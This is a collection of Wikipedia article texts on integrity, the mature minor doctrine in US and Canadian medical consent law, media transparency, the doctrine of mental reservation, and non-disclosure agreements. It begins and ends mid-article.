whom?]virtues of politicians are faithfulness, humility,[8]and accountability. Furthermore, they should[according to whom?]be authentic and a role model.Aristotleidentifieddignity(megalopsychia, variously translated as proper pride, greatness of soul, and magnanimity)[9]as the crown of the virtues, distinguishing it from vanity, temperance, and humility. "Integrity tests" or (more confrontationally) "honesty tests"[10]aim to identify prospective employees who may hide perceived negative or derogatory aspects of their past, such as a criminal conviction or drug abuse. Identifying unsuitable candidates can save the employer from problems that might otherwise arise during their term of employment. Integrity tests make certain assumptions, specifically:[11] The claim that such tests can detect "fake" answers plays a crucial role in detecting people who have low integrity. Naive respondents really believe this pretense and behave accordingly, reporting some of their past deviance and their thoughts about the deviance of others, fearing that if they do not answer truthfully their untrue answers will reveal their "low integrity". These respondents believe that the more candid they are in their answers, the higher their "integrity score" will be.[12][clarification needed] Disciplines and fields with an interest in integrity includephilosophy of action, philosophy ofmedicine,mathematics, themind,cognition,consciousness,materials science,structural engineering, andpolitics. Popular psychology identifies personal integrity, professional integrity, artistic integrity, and intellectual integrity. For example, to behave with scientific integrity, a scientific investigation shouldn't determine the outcome in advance of the actual results. As an example of a breach of this principle,Public Health England, a UK Government agency, stated that they upheld a line of government policy in advance of the outcome of a study that they had commissioned.[13] The concept of integrity may also feature inbusinesscontexts that go beyond the issues of employee/employer honesty and ethical behavior, notably in marketing or branding contexts. Brand "integrity" gives a company's brand a consistent, unambiguous position in the mind of their audience. This is established for example via consistent messaging and a set of graphics standards to maintain visual integrity inmarketing communications. Kaptein and Wempe developed a theory of corporate integrity that includes criteria for businesses dealing with moral dilemmas.[14] Another use of the term "integrity" appears inMichael Jensen's andWerner Erhard's paper, "Integrity: A Positive Model that Incorporates the Normative Phenomenon of Morality, Ethics, and Legality". The authors model integrity as the state of being whole and complete, unbroken, unimpaired, sound, and in perfect condition. They posit a model of integrity that provides access to increased performance for individuals, groups, organizations, and societies. Their model "reveals the causal link between integrity and increased performance, quality of life, and value-creation for all entities, and provides access to that causal link."[15]According to Muel Kaptein, integrity is not a one-dimensional concept. In his book he presents a multifaceted perspective of integrity. Integrity relates, for example, to compliance to the rules as well as to social expectations, to morality as well as to ethics, and to actions as well as to attitude.[8] Electronic signals are said to have integrity when there is no corruption of information between one domain and another, such as from a disk drive to a computer display. Such integrity is a fundamental principle ofinformation assurance. Corrupted information isuntrustworthy; uncorrupted information is of value.
https://en.wikipedia.org/wiki/Integrity
Themature minor doctrineis a rule of law found in theUnited StatesandCanadaaccepting that anunemancipated minorpatientmay possess thematurityto choose or reject a particularhealth caretreatment, sometimes without the knowledge or agreement of parents, and should be permitted to do so.[1]It is now generally considered a form of patientsrights; formerly, themature minor rulewas largely seen as protectinghealth care providersfromcriminaland civilclaimsby parents of minors at least 15 years old.[2] Jurisdictions maycodifyan age of medical consent, accept the judgment oflicensedproviders regarding an individual minor, or accept a formalcourt decisionfollowing a request that a patient be designated a mature minor, or may rely on some combination. For example, patients at least 16 may be assumed to be mature minors for this purpose,[3]patients aged 13 to 15 may be designated so by licensed providers, and pre-teen patients may be so-designated after evaluation by anagencyorcourt. The mature minor doctrine is sometimes connected with enforcingconfidentialityof minor patients from their parents.[4] In the United States, a typical statute lists:"Who may consent [or withhold consent for] surgical or medical treatment or procedures." By definition, a "mature minor" has been found to have thecapacityfordecisional autonomy, or the right to make decisions including whether to undergo risky but potentially life-saving medical decisions alone, without parental approval.[7]By contrast, "medical emancipation" formally releases children from some parental involvement requirements but does not necessarily grant that decision making to children themselves. Pursuant to statute, several jurisdictions grant medical emancipation to a minor who has becomepregnantor requiressexual-healthservices, thereby permitting medical treatment without parental consent and, often, confidentiality from parents. A limitedguardianshipmay be appointed to make medical decisions for the medically emancipated minor and the minor may not be permitted to refuse or even choose treatment.[8] One significant early U.S. case,Smith v. Seibly, 72 Wn.2d 16, 431P.2d719 (1967), before theWashington Supreme Court, establishes precedent on the mature minor doctrine. The plaintiff, Albert G. Smith, an 18-year-old married father, was suffering frommyasthenia gravis, a progressive disease. Because of this, Smith expressed concern that his wife might become burdened in caring for him, for their existing child and possibly for additional children. On March 9, 1961, while still 18, Smith requested avasectomy. His doctor requiredwritten consent, which Smith provided, and the surgery was performed. Later, after reaching Washington's statutoryage of majority, then 21, the doctor was sued by Smith, who now claimed that he had been a minor and thus unable to grant surgical or medical consent. The Court rejected Smith's argument: "Thus, age, intelligence, maturity, training, experience, economic independence or lack thereof, general conduct as an adult and freedom from the control of parents are all factors to be considered in such a case [involving consent to surgery]." The court further quoted another recently decided case,Grannum v. Berard, 70 Wn.2d 304, 307, 422P.2d812 (1967): "The mental capacity necessary to consent to a surgical operation is a question of fact to be determined from the circumstances of each individual case." The court explicitly stated that a minor may grant surgical consent even without formal emancipation. Especially since the 1970s, older pediatric patients sought to make autonomous decisions regarding their own treatment, and sometimes sued successfully to do so.[9]The decades of accumulated evidence tended to demonstrate that children are capable of participating in medical decision-making in a meaningful way;[10][11]and legal and medical communities have demonstrated an increasing willingness to formally affirm decisions made by young people, even regarding life and death.[12] Religious beliefs have repeatedly influenced a patient's decision to choose treatment or not. In a case in 1989 in Illinois, a 17-year-old femaleJehovah's Witnesswas permitted to refuse necessary life saving treatments.[13] In 1990, theUnited States Congresspassed thePatient Self-Determination Act; even though key provisions apply only to patients over age 18,[14]the legislation advanced patient involvement in decision-making. TheWest Virginia Supreme Court, inBelcher v. Charleston Area Medical Center(1992) defined a "mature minor" exception toparental consent, according consideration to seven factors to be weighed regarding such a minor: age, ability, experience, education, exhibited judgment, conduct, and appreciation of relevant risks and consequences.[15][16] The 2000s and 2010s experienceda number of outbreaksof vaccine-preventable diseases, such as the2019–2020 measles outbreaks, which were fueled in part by vaccine hesitancy. This prompted minors to seek vaccinations over objections from their parents.[17][18]Beginning in the 2020s during theCOVID-19 pandemic, minors also began seeking out theCOVID-19 vaccineover the objections of their vaccine-hesitant parents.[19]This has led to proposals and bills allowing minor to consent to be administered with any approved vaccine.[20] TheSupreme Court of Canadarecognized mature minor doctrine in 2009 inA.C. v. Manitoba[2009] SCC 30; in provinces and territories lacking relevant statutes, common law is presumed to be applied.[21] Several states permit minors to legally consent to general medical treatment (routine, nonemergency care, especially when the risk of treatment is considered to be low) without parental consent or over parental objections, when the minor is at least 14 years old.[25]In addition, many other states allow minors to consent to medical procedures under a more limited set of circumstances. These include providing limited minor autonomy only in enumerated cases, such asblood donation,substance abuse,sexual and reproductive health(includingabortionandsexually transmitted infections), or for emergency medical services. Many states also exempt specific groups of minors from parental consent, such ashomeless youth,emancipated minors, minor parents, ormarried minors.[26]Further complicating matters is the interaction between state tort law, state contract law, and federal law, depending on if the clinic accepts federal funding underTitle XorMedicaid.[26] In the United States,bodily integrityhas long been considered acommon law right; The Supreme Court in 1990 (Cruzan v. Director, Missouri Department of Health) allowed that "constitutionally protectedliberty interestin refusing unwanted medical treatment may be inferred" in theDue ProcessClauseof theFourteenth Amendment to the United States Constitution, but the Court refrained from explicitly establishing what would have been a newly enumerated right. Nevertheless, lower courts have increasingly held that competent patients have the right to refuse any treatment for themselves.[31] In 1989, theSupreme Court of Illinoisinterpreted theSupreme Court of the United Statesto have already adopted major aspects of mature minor doctrine, concluding, In 2016 the case of "In re Z.M." was heard in Maryland regarding a minor's right to refuse chemotherapy.[33] In Connecticut, Cassandra C. a seventeen-year-old, was ordered by the Connecticut Supreme Court to receive treatment. The court decided that Cassandra was not mature enough to make medical decisions.[34][13] In 2009, theSupreme Court of Canadaruling inA.C. v. Manitoba[2009] SCC 30 (CanLII) found that childrenmaymake life and death decisions about their medical treatment. In the majority opinion,JusticeRosalie Abellawrote: A "dissenting"[35]opinion by JusticeIan Binniewould have gone further: Analysts note that the Canadian decision merely requires that younger patients be permitted ahearing, and still allows a judge to "decide whether or not to order a medical procedure on an unwilling minor".[37]
https://en.wikipedia.org/wiki/Mature_minor_doctrine
Media transparency, also referred to astransparent mediaormedia opacity,[1]is a concept that explores how and whyinformation subsidiesare being produced, distributed and handled by media professionals, including journalists, editors, public relations practitioners, government officials, public affairs specialists, and spokespeople. In short, media transparency reflects the relationship between civilization and journalists, news sources and government. According to a textual analysis of "Information Subsidies and Agenda Building: A Study of Local Radio News", an information subsidy is defined as "any item provided to the media in order to gain time or space[2]". Media transparency deals with the openness and accountability of the media and can be defined as a transparent exchange of information subsidies based on the ideas of newsworthiness.[3]Media transparency is one of the biggest challenges of contemporary everyday media practices around the world as media outlets and journalists constantly experience pressures from advertisers, information sources, publishers, and other influential groups.[4] News sources may influence what information is published or not published. Sometimes, published information can also be paid for by news sources, but the end media product (an article, a program, a blog post) does not clearly indicate that the message has been paid or influenced in any way. Such media opacity, or media non-transparency, ruins the trust and transparency between the media and the public and have implications for transparency of new forms of advertising and public relations (such as native advertising and brand journalism).[5] Media transparency is defined to be a normative concept and is achieved when: An important note concerning Media Transparency is the use of ICTs, which can be defined as "Information and Communication Technology[6]". ICTs are the online ways in which communication will be discussed in the following sections of this entry page. Transparency using the Internet has been a large fascination of social scientists, and the research surrounding transparency continues to grow. The basis to understanding transparency and technology is emphasized byYoni Van Den Eedeto be the work ofMartin HeideggerandMarshall McLuhan. Eede claims, "In recent years several approaches – philosophical, sociological, psychological – have been developed to come to grips with our profoundlytechnologically mediatedworld[7]" (Eede, 2011). Yet continues to explain that these recent discoveries would have not been made without the work first accomplished concerning media and technology by Heidegger and McLuhan. Martin Heidegger began the studies without using the word transparency, but its relevance is clear within his "Tool Analysis".[7]The "Tool Analysis" argues that one is never aware of the tools they use in their every life until it no longer functions as it should, or as Eede concludes, "the tool is 'transparent' in the sense that we don't notice it "as-tool".[7]The tool in this context is media, and as the study argues we do not notice media and the presence it holds in our life. Eede expands on the Tool Analysis curated by Heidegger as she states there are two ways in which humans use tools, readiness to hand and presence at hand.[7]This separation of readiness and presence is explained further by G. Harman as he argues that the theory proposed by Heidegger can be understood through what we consciously view as helpful versus what is unconsciously helping us (humankind). Harman claims, "If I observe a table and try to describe its appearance, I silently rely on a vast armada of invisible things that recede into a tacit background. The table that hovers visibly before my mind is outnumbered by all the invisible items that sustain my current reality: floor, oxygen, air conditioning, bodily organs"[8](Harman, 2010). Through understanding this 'table' analogy, one can conclude that the table in this sense is technology, and its use to create transparency and understanding within society concerning social and economic doings of government and the greater power of which governs each nation and entity is the vast background of which is overlooked,[8]just as the surroundings of the table are. Through this understanding of theory, transparency can then be further explored for its major importance in creating ones environment consciously and unconsciously. Another important theorist to consider when researching ICTs and transparency is Marshall McLuhan, who coined the term "the medium is the message".[7]McLuhan conducted his work within the 1960s, with the introduction of the global village and age of technology use in communications. The concept of transparency is heavily explored within McLuhan's media theory which examines the media as the channels of medium in which media is presented (television, radio, etc.) which are then defined to be the real messages of the media themselves, and emphasis is placed upon understanding the means of medium rather than content itself as they "manifest themselves first and foremost in the way we perceive, process and interpret sense data"[7](Eede, 2011). Through understanding the actual medium to be the message, and as the medium itself creates a greater understanding and transparent view of the world around us, one can conclude that McLuhan's work is essential to then looking to understand why ICTs and a sense of transparency concerning day to day life, government work, and national/ global work is of importance. McLuhan, to summarize, concluded that society must be more involved, and that its participates are actively looking to be more involved as they navigate their social understanding and surrounding.[9] Within the study conducted by the Government Information Quarterly, Media Transparency is understood through means of its ability to aid societies with openness and anti-corruption. This unbiased approach at understanding media transparency specifically deals with how media transparency is an important aspect of social and economic development. The article cited explores the four main channels of transparency at the governmental level; proactive dissemination by the government; release of requested materials by the government; public meetings; and leaks from whistleblowers.[10]These four means of communication help to deter any type of negative propaganda posed by governments and officials and work towards complete transparency of which is arguably necessary to create a thriving social and economic system. Propaganda stands to be a threat to accurate distribution and intake of information, of which disrupts all that transparency works to accomplish. The following sections open on greater aspects of Propaganda, and different ways in which transparency is disrupted as well. Corruption and Media Bribery are large concepts of interest when considering the importance of Media Transparency. The concept of Media Bribery emerged in response to claims of bias within the media. This lack of media transparency can be perceived as a form of corruption. Media transparency is a means to diminish unethical and illegal practices in the relationships between news sources and the media. Within a study conducted by the Government Information Quarterly it is stated that, "The focus on corruption as an economic issue has been part of an overall rise in global interest in transparency. Internationally, corruption has received great attention since 1990 due to fears of increasing opportunities for illicit activity due to globalization (Brown & Cloke, 2005)".[10]There are many areas of concern when it comes to bribery and corruption, specifically law enforcement and government regulation. Corruption of the media and barriers to transparency can be captured through means of propaganda and misinformation. These can be actively be worked against through means of administrative reform, stricter watch and regulation of law enforcement, and through means of social change.[10] Academics at theUniversity of OxfordandWarwick Business School, conducting empirical research on the operation and effects of transparent forms of clinical regulation in practice, describe a form of 'spectacular transparency'. The social scientists suggest that government policy tends to react to high-profile media 'spectacles', leading to regulatory policy decisions that appear to respond to problems exposed in the media have new perverse effects in practice, which are unseen by regulators or the media.[11][12] The degree to which state agents work to influencevideo productioncontradicts the use of those images by news organizations as indexical, objective representations. Because people tend to strongly equate seeing with knowing, video cultivates an inaccurate impression that they are getting the "full picture". It has been said that "what is on the news depends on what can be shown". The case studies (include case studies) for this project demonstrate that what can be shown is often decided in concern with political agents. Essentially, the way the media presents its information can creates an illusion of transparency.[13]The presentation of media is further explored for its interest in the human experience through work done byGeorge Gerbnerand hisCultivation Theory. As explained by analyst W. James Potter, Gerbner was "concerned with the influence that a much broader scope of messages gradually exerted on the public as people were exposed to media messages in their everyday lives"[14](Potter, 2014). Gerbner quenstioned previous theorists attempts to understand media and power over civilization by means of television programs and direct intake. Gerbner asserted that in order to understand the impact of the media, research must be done concerning the environment in which people are living, and studying the world as presented by medium channels.[14]Potter argues that "while Gerbner recognized that there were individual differences in interpretations of messages, cultivation was not concerned about those variations in interpretations; instead, cultivation focused on the dominant meanings that the media presented to the public" (Potter, 2014). Through Gerbner's Cultural Indicators Research Project, power is explored through its presentation in the media, and George argues that to create a transparent environment in which cultural and social norms are unbiased, one must look to understand whether transparency is being held by media sources or if it is being manipulated in order to control civilization and keep power.[15]The work of analyst John A. Lent uncovers Gerbner's understanding of power structure through the control of media and medium channels as he states," viewers came to consider the world as rightly belonging to the power and money elite depicted on television – young, white males, idealized as heroic doctors and other professionals. He warned that women, minorities and the elderly seeing these role models repeatedly were apt to accept their own inferior positions and opportunities as inevitable and deserved, which he said was an indictment of their civil rights" (Lent 2006 p.88). Power, then can be understood with those who control the media outlets, and the level of transparency concerning worldly events, biased opinions, and representation that are conveyed to the citizens who live within the media controlled environment. Power is not within the eye of the beholder, yet within those who project to the greater population. The creation of an Electronic Government and the use of the internet along with social media is a new way to get information concerning government work and service to citizens. The use of media in all electronic forms is argued to be an "influential factor in the restoration of trust in government because it has the potential to improve government performance and transparency" within the study published by the Public Performance and Management Review[16](Song and Lee, 2016). The study continues to argue that many studies have reported that through information and transaction services available on government websites, citizens feel a sense of effectiveness, accessibility, responsiveness, and satisfaction,[16]all of which constitute an overall sense of trust in government. These information and transaction services are more specifically categorized as social media sites that connect citizens to their government. Song and Lee conclude that, "social media can be defined as a group of Web 2.0 technologies that facilitate interactions between users [...] By their nature, social media afford easy access to information through convenient devices like cell phones and tablets, enable user-created content, and provide visible social connections[16]" (Song and Lee, 2016). From a citizens perspective, transparency is attained through understanding their local governments actions and movements, along with creating open lines of communication; all of which can be done through social media and other means of online communication.[16]Song and Lee conclude following their experiment concerning media use in relation to government that " social media in government enable citizens to gain easier access to government and be more informed about current events, policies, or programs, heightening their perception of transparency in government"[16](Song and Lee, 2016). This conclusion argues for social media presence in governmental action and role in order to create transparency; media transparency is needed for a cohesive and close-knit society. The ability to curate trust is essential within the means of transparency and communication. Within the article published by Changsoo Song and Jooho Lee, the two explain trust though work compiled by social theoristJ. S Colemanas he looks to simply trust through equivocal explanation. The study states that, "Three essential elements" are used in explaining what leads a potential trustor (e.g., the citizen) to vest trust in a trustee (e.g., the government): Song and Lee then apply this framework to governmental context and conclude that role of information is necessary in trust-building as governments must perform or take in action in their citizens interest (and visibly show this action or performance via social media), in order to gain trust in and respect for their work.[16]
https://en.wikipedia.org/wiki/Media_transparency
Mental reservation(ormental equivocation) is anethical theoryand a doctrine in moral theology which recognizes the "lie of necessity", and holds that when there is a conflict between justice andtelling the truth, it is justice that should prevail. The doctrine is a special branch ofcasuistry(case-based reasoning) developed in the lateMiddle Agesand theRenaissance. While associated with theJesuits, it did not originate with them. It is a theory debated by moral theologians, but not part ofCanon law. It was argued inmoral theology, and now inethics, that mental reservation was a way to fulfill obligations both to tell the truth and to keep secrets from those not entitled to know them (for example, because of theseal of the confessionalor other clauses ofconfidentiality). Mental reservation, however, is regarded as unjustifiable without grave reason for withholding the truth. This condition was necessary to preserve a general idea oftruthin social relations. Social psychologistshave advanced cases[1]where the actor is confronted with anavoidance-avoidance conflict, in which he both does not want to say the truth and does not want to make an outright lie; in such circumstances, equivocal statements are generally preferred. This type of equivocation has been defined as "nonstraightforward communication...ambiguous, contradictory, tangential, obscure or even evasive."[2]People typically equivocate when posed a question to which all of the possible replies have potentially negative consequences, yet a reply is still expected (the situational theory of communicative conflict).[3] TheBiblecontains a good example of equivocation.Abrahamwas married to Sarah/Sarai, his half-sister by a different mother. Fearing that as he traveled people would covet his beautiful wife and as a result kill him to take her, he counselled her to agree with him when he would say that "she is my sister". This happened on two occasions, first with thePharaohof Egypt, told inGenesis12:11-13, and second, with a king calledAbimelechin Genesis 20:12. Abraham later explained to Abimelech that Sarah was indeed his sister, as they shared the same father, although had different mothers. WritersPetrus Serrarius,Giovanni Stefano MenochioandGeorge Leo Haydockalso refer to mental reservation as justification for Judith's false explanation that she intended to betray her people to the Assyrians in thedeuterocanonical bookwhichbears her name.[4] A frequently cited example of equivocation is a well-known incident from the life ofAthanasius of Alexandria. WhenJulian the Apostatewas seeking Athanasius's death, Athanasius fled Alexandria and was pursued up theNile. Seeing the imperial officers were gaining on him, Athanasius took advantage of a bend in the river that hid his boat from its pursuers and ordered his boat turned around. When the two boats crossed paths, the Roman officers shouted out, asking if anyone had seen Athanasius. As instructed by Athanasius, his followers shouted back, "Yes, he is not very far off." The pursuing boat hastily continued up the river, while Athanasius returned to Alexandria, where he remained in hiding until the end of the persecution.[5] Another anecdote often used to illustrate equivocation concernsFrancis of Assisi. He once saw a man fleeing from a murderer. When the murderer then came upon Francis, he demanded to know if his quarry had passed that way. Francis answered, "He did not pass this way", sliding his forefinger into the sleeve of hiscassock, thus misleading the murderer and saving a life.[6]A variant of this anecdote is cited by thecanonistMartin de Azpilcuetato illustrate his doctrine of a mixed speech (oratoria mixta) combiningspeechandgesturalcommunication.[7] When there was good reason for using equivocation, its lawfulness was admitted by all moral theologians. Traditionally, the doctrine of mental reservation was intimately linked with the concept ofequivocation, which allowed the speaker to employ double meanings of words to tell theliteraltruth while concealing a deeper meaning. The traditional teaching of moral theologians is that a lie is intrinsically evil, and therefore, never allowed. However, there are instances where one is also under an obligation to keep secrets faithfully, and sometimes the easiest way of fulfilling that duty is to say what is false, or to tell a lie. Writers of all creeds and of no creed, both ancient and modern, have frankly accepted this position. They admit the doctrine of the "lie of necessity", and maintain that when there is a conflict between justice and veracity it is justice that should prevail. The common Catholic teaching has formulated the theory of mental reservation as a means by which the claims of both justice and veracity can be satisfied.[8] If there is no good reason to the contrary, truth requires all to speak frankly and openly in such a way as to be understood by those who are addressed. A sin is committed if mental reservations are used without just cause, or in cases when the questioner has a right to the naked truth.[8] In "wide mental reservation" the qualification comes from the ambiguity of the words themselves, or from the circumstances of time, place, or person in which they are uttered. Spanish DominicanRaymond of Peñafortwas a noted canon lawyer, and one of the first writers on casuistry, i.e., seeking to resolve moral problems by extracting or extending theoretical rules from a particular case and applying them to new instances. He noted thatAugustine of Hipposaid that a man must not slay his own soul by lying in order to preserve the life of another, and that it would be a most perilous doctrine to admit that we may do a lesser evil to prevent another doing a greater. He said that while most doctors teach this, he acknowledged that others allow that a lie should be told when a man's life is at stake. Raymond gave as an example, if one is asked by murderers bent on taking the life of someone hiding in the house whether he is in: Raymond did not believe that Augustine would have objection to any of these.[8]Those who hear them may understand them in a sense which is not true, but their self-deception may be permitted by the speaker for a good reason. According toMalloch and Huntley (1966), this doctrine of permissible "equivocation" did not originate with the Jesuits. They cite a short treatise,in cap. Humanae aures, that had been written byMartin Azpilcueta(also known as Doctor Navarrus), anAugustinianwho was serving as a consultant to theApostolic Penitentiary.[9]It was published in Rome in 1584. The firstJesuitinfluence upon this doctrine was not until 1609, "when Suarez rejected Azpilcueta's basic proof and supplied another" (speaking ofFrancisco Suárez). The 16th-century Spanish theologianMartin de Azpilcueta(often called "Navarrus" because he was born in the Kingdom ofNavarre) wrote at length about the doctrine ofmentalis restrictioor mental reservation. Navarrus held that mental reservation involved truths "expressed partly in speech and partly in the mind," relying upon the idea that God hears what is in one's mind while human beings hear only what one speaks. Therefore, the Christian's moral duty was to tell the truth to God. Reserving some of that truth from the ears of human hearers was moral if it served a greater good. This is the doctrine of "strict mental reservation", by which the speaker mentally adds some qualification to the words which they utter, and the words together with the mental qualification make a true assertion in accordance with fact.[8] Navarrus gave the doctrine of mental reservation a far broader and more liberal interpretation than had anyone up to that time. Although some other Catholic theological thinkers and writers took up the argument in favor of strict mental reservation, canonistPaul Laymannopposed it; the concept remained controversial within the Roman Catholic Church, which never officially endorsed or upheld the doctrine and eventuallyPope Innocent XIcondemned it as formulated bySanchezin 1679. After this condemnation by the Holy See no Catholic theologian has defended the lawfulness of strict mental reservations. The linked theories of mental reservation and equivocation became notorious in England during theElizabethan eraand theJacobean era, when Jesuits who had entered England to minister to the spiritual needs of Catholics were captured by the authorities. The JesuitsRobert Southwell(c. 1561–1595) (who was also a poet of note) andHenry Garnet(1555–1606) both wrote treatises on the topic, which was of far more than academic interest to them. Both risked their lives bringing the sacraments torecusantCatholics — and not onlytheirlives, since sheltering a priest was a capital offence.[10]In 1586,Margaret Clitherowhad beenpressedto death for refusing to enter a plea on the charge of harbouring two priests at York.[11]When caught, tortured and interrogated, Southwell and Garnet practiced mental reservation not to save themselves — their deaths were a foregone conclusion — but to protect their fellow believers.[10] Southwell, who was arrested in 1592, was accused at his trial of having told a witness that even if she was forced by the authorities to swear under oath, it was permissible to lie to conceal the whereabouts of a priest. Southwell replied that that was not what he had said. He had said that "to an oath were required justice, judgement and truth", but the rest of his answer goes unrecorded because one of the judges angrily shouted him down.[12]Convicted in 1595, Southwell washanged, drawn and quartered. More famous in his own era was Henry Garnet, who wrote a defense of Southwell in 1598; Garnet was captured by the authorities in 1606 due to his alleged involvement in theGunpowder Plot. Facing the same accusations as Southwell, his attempts to defend himself met with no better result: later that year, Garnet was executed in the same fashion. TheProtestantsconsidered these doctrines as mere justifications for lies. Catholic ethicists also voiced objections: theJansenist"Blaise Pascal...attacked the Jesuits in the seventeenth century for what he saw as their moral laxity."[13]"By 1679, the doctrine of strict mental reservation put forward by Navarrus had become such a scandal thatPope Innocent XIofficially condemned it."[14]Other casuists justifying mental reservation includedThomas Sanchez, who was criticized by Pascal in hisProvincial Letters– although Sanchez added various restrictions (it should not be used in ordinary circumstances, when one is interrogated by competent magistrates, when acreedis requested, even forheretics, etc.), which were ignored by Pascal. This type of equivocation was famously mocked in the porter's speech inShakespeare'sMacbeth, in which the porter directly alludes to the practice of deceiving under oath by means of equivocation. "Faith, here's an equivocator, that could swear in both the scales against either scale; who committed treason enough for God's sake, yet could not equivocate to heaven." (Macbeth, Act 2, Scene 3) See, for exampleRobert SouthwellandHenry Garnet, author ofA Treatise of Equivocation(published secretly c. 1595)—to whom, it is supposed, Shakespeare was specifically referring.[citation needed]Shakespeare made the reference to priests because the religious use of equivocation was well known in those periods of early modern England (e.g. underJames VI/I) when it was a capital offence for a Roman Catholic priest to enter England. A Jesuit priest would equivocate in order to protect himself from the secular authorities without (in his eyes) committing the sin of lying. Following Innocent XI's condemnation of strict mental reservation, equivocation (or wide mental reservation) was still considered orthodox, and was revived and defended byAlphonsus Liguori. The JesuitGabriel Danielwrote in 1694Entretiens deCleantheet d'Eudoxesur les lettres provinciales, a reply to Pascal'sProvincial Lettersin which he accused Pascal of lying, or even of having himself used mental reservation, by not mentioning all the restrictions imposed by Sanchez on the use of this form of deception. In hislicentiatethesis, Edouard Guilloux says that it is shown from the study of language "that there can be a gap between what a speaker means when he utters a given sentence and the literal meaning of that same sentence", yet "the literal meaning of a sentence must be apt to convey what the speaker means: the speaker cannot authentically be said to have meant to say something that has no relation to the literal meaning of the sentence he utters." "Since the non-literal meaning intended by the speaker can be detected in the circumstances of his utterance, he can authentically be said to have meant to say it, and if that meaning yields a true statement, then he has said nothing false."[15]According to Alphonsus Liguori, for the licit use of a mental reservation, "an absolutely serious cause is not required; any reasonable cause is enough, for instance to free oneself from the inconvenient and unjust interrogation of another." Alphonsus said, "we do not deceive our neighbor, but for a just cause we allow that he deceive himself."[16] TheNew Catholic Encyclopediasays, "A man can affirm that he had coffee and toast for breakfast without denying that he had an egg, or he might affirm that he has a lesser amount of money in his pocket without denying that he also has a greater amount. So long as he has reasonable cause to conceal part of the truth, he does no wrong, provided, of course, that he is careful not to indicate that he has 'only' so much to eat or that he has 'only' so much money." Also, if "a wife, who has been unfaithful but after her lapse has received the Sacrament of Penance, is asked by her husband if she has committed adultery, she could truthfully reply: 'I am free from sin.'"[17] This type of untruth was condemned byKantinOn a supposed right to lie. Kant was debating againstBenjamin Constant, who had claimed, from aconsequentialiststance opposed to Kant'scategorical imperative, that: "To tell the truth is thus a duty; but it is only in respect to one who has a right to the truth. But no one has a right to a truth which injures others."[18] On the other hand, Kant asserted, in theGroundwork of the Metaphysic of Morals, that lying, or deception of any kind, would be forbidden under any interpretation and in any circumstance. InGroundwork, Kant gives the example of a person who seeks to borrow money without intending to pay it back. The maxim of this action, says Kant, results in a contradiction in conceivability (and thus contradicts perfect duty) because it would logically contradict the reliability of language. If it is universally acceptable to lie, then no one would believe anyone and all truths would be assumed to be lies (this last clause was accepted by casuists, hence the reasons for restrictions given to the cases where deception was authorized).[19]The right to deceive could also not be claimed because it would deny the status of the person deceived as an end in himself. And the theft would be incompatible with a possible kingdom of ends. Therefore, Kant denied the right to lie or deceive for any reason, regardless of context or anticipated consequences. However, it was permissible to remain silent or say no more than needed (such as in the infamous example of a murderer asking to know where someone is). The doctrines have also been criticized bySissela Bok[20]and byPaul Ekman, who defines lies by omission as the main form of lying – though larger and more complex moral and ethical issues oflyingandtruth-telling extend far beyond these specific doctrines. Ekman, however, does not consider cases of deception where "it is improper to question" the truth as real form of deceptions[21]– this sort of case, where communication of truth is not to be expected and so deception is justified, was included by casuists.[19] TheIrish Catholic Churchallegedly misused the concept of mental reservation when dealing with situations relating toclerical child sexual abuse, by disregarding the restrictions placed on its employment by moral theologians and treating it as a method that "allows clerics (to) mislead people...without being guilty of lying",[22]for example when dealing with the police, victims, civil authorities and media. In theMurphy Reportinto thesexual abuse scandal in the Catholic archdiocese of Dublin, CardinalDesmond Connelldescribes it thus: Well, the general teaching about mental reservation is that you are not permitted to tell a lie. On the other hand, you may be put in a position where you have to answer, and there may be circumstances in which you can use an ambiguous expression realising that the person who you are talking to will accept an untrue version of whatever it may be – permitting that to happen, not willing that it happened, that would be lying. It really is a matter of trying to deal with extraordinarily difficult matters that may arise in social relations where people may ask questions that you simply cannot answer. Everybody knows that this kind of thing is liable to happen. So mental reservation is, in a sense, a way of answering without lying. Cathleen Kaveny, writing in the Catholic magazineCommonweal, notes that Henry Garnet in his treatise on the topic took pains to argue that no form of mental reservation was justified — and might even be amortal sin— if it would run contrary to the requirements of faith, charity or justice.[10]But according to the Murphy Report: The Dublin Archdiocese's preoccupations in dealing with cases of child sexual abuse, at least until the mid 1990s, were the maintenance of secrecy, the avoidance ofscandal, the protection of the reputation of the church, and the preservation of its assets. All other considerations, including the welfare of children and justice for victims, were subordinated to these priorities. The archdiocese did not implement its owncanon-lawrules and did its best to avoid any application of the law of the state. Kaveny concludes: "The truths of faith are illuminated by the lives of themartyrs. Southwell and Garnet practiced mental reservation to save innocent victims while sacrificing themselves. The Irish prelates practiced mental reservation to save themselves while sacrificing innocent victims. And that difference makes all the difference."[10] In the Australian case of Deacon v Transport Regulation Board (Supreme Court of Victoria, 1956), Deacon argued that payments for interstate transport licensing had been made under duress and should be reimbursed. The court held that on the facts of the case, payment had been made voluntarily, and without protest, and observed that No secret mental reservation of the doer is material. The question is - what would hisconductindicate to a reasonable man as his mental state?[23] The case and the same wording were referenced in the 1979 English case ofNorth Ocean Shipping Co. Ltd. v Hyundai Construction Co., Ltd.[24]
https://en.wikipedia.org/wiki/Doctrine_of_mental_reservation
Anon-disclosure agreement(NDA), also known as aconfidentiality agreement(CA),confidential disclosure agreement(CDA),proprietary information agreement(PIA), orsecrecy agreement(SA), is alegalcontractor part of a contract between at least twopartiesthat outlines confidential material, knowledge, or information that the parties wish to share with one another for certain purposes, but wish to restrict access to.Doctor–patient confidentiality(physician–patient privilege),attorney–client privilege,priest–penitent privilegeandbank–client confidentialityagreements are examples of NDAs, which are often not enshrined in a written contract between the parties. It is a contract through which the parties agree not to disclose any information covered by the agreement. An NDA creates a confidential relationship between the parties, typically to protect any type of confidential and proprietary information ortrade secrets. As such, an NDA protects non-public business information. Like all contracts, they cannot be enforced if thecontracted activities are illegal. NDAs are commonly signed when two companies, individuals, or other entities (such as partnerships, societies, etc.) are considering doing business and need to understand the processes used in each other's business for the purpose of evaluating the potential business relationship. NDAs can be "mutual", meaning both parties are restricted in their use of the materials provided, or they can restrict the use of materials by a single party. An employee can be required to sign an NDA or NDA-like agreement with an employer, protecting trade secrets. In fact, some employment agreements include a clause restricting employees' use and dissemination of company-owned confidential information. In legal disputes resolved bysettlement, the parties often sign a confidentiality agreement relating to the terms of the settlement.[1][2]Examples of such agreements are The Dolby Trademark Agreement withDolby Laboratories, the Windows Insider Agreement, and theHaloCFP (Community Feedback Program) withMicrosoft. In some cases, employees who are dismissed following their complaints about unacceptable practices (whistleblowers), or discrimination against and harassment of themselves, 